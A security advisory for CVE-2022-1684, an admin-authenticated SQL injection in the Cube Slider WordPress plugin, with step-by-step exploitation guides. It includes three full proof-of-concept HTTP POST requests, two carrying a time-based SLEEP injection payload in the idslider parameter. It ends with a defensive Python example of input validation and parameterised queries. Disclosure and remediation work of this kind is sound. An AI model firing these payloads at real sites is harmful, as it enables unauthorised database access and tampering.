CVE-2022-1684: Security Bulletin
The Cube Slider WordPress plugin through 1.2 does not sanitise and escape the idslider parameter before using it in various SQL queries, leading to SQL Injections exploitable by high privileged users such as admin.
cube-slider 1.2 WordPress plugin SQL injection

Vulnerability Metadata
Date of Disclosure: May 09 2022
Affected Software: cube-slider
Affected Software Type: WordPress plugin
Version: 1.2
Weakness: SQL Injection
CWE ID: CWE-89
CVE ID: CVE-2022-1684
CVSS 3.x Base Score: x
CVSS 2.0 Base Score: x
Reporter: Daniel Krohmer, Shi Chen
Reporter Contact:
Link to Affected Software: https://wordpress.org/plugins/cube-slider
Link to Vulnerability DB: https://nvd.nist.gov/vuln/detail/CVE-2022-1684
Vulnerability Description
The idslider data parameter in cube-slider 1.2 is vulnerable to SQL injection in three different code sections of ./init.php. An authenticated attacker with admin privileges may abuse the edit, delete or save functionality of the plugin by crafting a malicious POST request.
Exploitation Guide
Exploit 1: Edit
Log in as admin user. This attack requires at least admin privileges.
Go to Settings and select Cube Slider in the sub menu.
Add a new cube slider by clicking on New Cube Slider.
Scroll down and use the Click to edit slider x details button.
Clicking that button triggers the vulnerable request; idslider is the vulnerable data parameter.
A PoC request is given below under Exploit Payload 1: Edit.
In the code, the vulnerability is triggered by unsanitized user input of idslider at line 207 in ./init.php.
Exploit 2: Delete
Log in as admin user. This attack requires at least admin privileges.
Go to Settings and select Cube Slider in the sub menu.
Delete an arbitrary, existing slider by clicking on Click to delete slider x.
Clicking that button triggers the vulnerable request; idslider is the vulnerable data parameter. (Note: the numeric ID value can be set arbitrarily.)
A PoC request is given below under Exploit Payload 2: Delete.
In the code, the vulnerability is triggered by unsanitized user input of idslider at line 210 in ./init.php.
Exploit 3: Save
Log in as admin user. This attack requires at least admin privileges.
Go to Settings and select Cube Slider in the sub menu.
Add a new cube slider by clicking on New Cube Slider.
Scroll down and use the Save changes button. No further data input is needed before clicking this button.
Clicking that button triggers the vulnerable request; idslider is the vulnerable data parameter.
A PoC request is given below under Exploit Payload 3: Save.
In the code, the vulnerability is triggered by unsanitized user input of idslider at line 199 in ./init.php. Notice that there is no sanitization at all in the whole query!
Exploit Payload
Note that the cookies and nonces must be replaced with those of your own session; otherwise the exploit will not work. The SQL injection can be triggered by sending the requests below.
Exploit Payload 1: Edit
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details
Exploit Payload 2: Delete
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4
Exploit Payload 3: Save
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C8968917a5337f07f5db390194b15adfae8e850d20bc1c476fb1224002a9d5ca4; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C5d10d0aa6e661c1d443d69997bb114ab7ea5fe8071c573c62f098d0ece9efe01; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651517751
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=6&name=Name&about=About&title1=Title+1&description1=Description+1&title2=Title+2&description2=Description+2&title3=Title+3&description3=Description+3&title4=Title+4&description4=Description+4&icon1=fa-glass&color1=%2381d742&icon2=fa-glass&color2=%2381d742&icon3=fa-glass&color3=%2381d742&icon4=fa-glass&color4=%2381d742&submit=Save+Changes
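As an added example (not code from the advisory or from the plugin), the following shows the input check a patched handler should apply to idslider, run against the three PoC bodies above, and puts the string-built query next to a bound-parameter query on an in-memory SQLite table so the difference is visible. The slider table schema and its rows are assumptions; the save body is abridged to the fields the handler needs.

```python
import sqlite3
from urllib.parse import parse_qs
# POST bodies from the advisory's three PoC requests (save body abridged to the relevant fields).
POC_BODIES = {
    "edit": "idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details",
    "delete": "idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4",
    "save": "idslider=6&name=Name&about=About&submit=Save+Changes",
}

def raw_idslider(body):
    """The decoded idslider value exactly as the plugin receives it from the POST body."""
    return parse_qs(body, keep_blank_values=True).get("idslider", [""])[0]

def validate_idslider(body):
    """Return idslider as an int only if it is one bare ASCII decimal integer, else None."""
    values = parse_qs(body, keep_blank_values=True).get("idslider", [])
    if len(values) != 1 or not (values[0].isascii() and values[0].isdigit()):
        return None  # rejects "4 AND (SELECT ...)", empty values and repeated parameters
    return int(values[0])

def make_db():
    """In-memory stand-in for the plugin's slider table (assumed schema, constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sliders (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO sliders VALUES (?, ?)", [(4, "four"), (6, "six")])
    return conn

def fetch_slider_unsafe(conn, raw_id):
    """Vulnerable pattern: the raw parameter is spliced into the SQL text."""
    return conn.execute(f"SELECT name FROM sliders WHERE id = {raw_id}").fetchone()

def fetch_slider_safe(conn, raw_id):
    """Hardened pattern: bound parameter (what $wpdb->prepare() provides in WordPress)."""
    return conn.execute("SELECT name FROM sliders WHERE id = ?", (raw_id,)).fetchone()

def injected_text_reaches_parser(raw_id):
    """True if splicing raw_id into the SQL makes the engine parse it as SQL. SQLite has no
    SLEEP(), so the PoC payload fails at prepare time; MySQL would execute the SLEEP instead."""
    try:
        fetch_slider_unsafe(make_db(), raw_id)
        return False
    except sqlite3.OperationalError:
        return True

def handle(body):
    """Hardened request handler: validate first, then query only with a bound parameter."""
    idslider = validate_idslider(body)
    if idslider is None:
        return "rejected"
    row = fetch_slider_safe(make_db(), idslider)
    return row[0] if row else "not found"
```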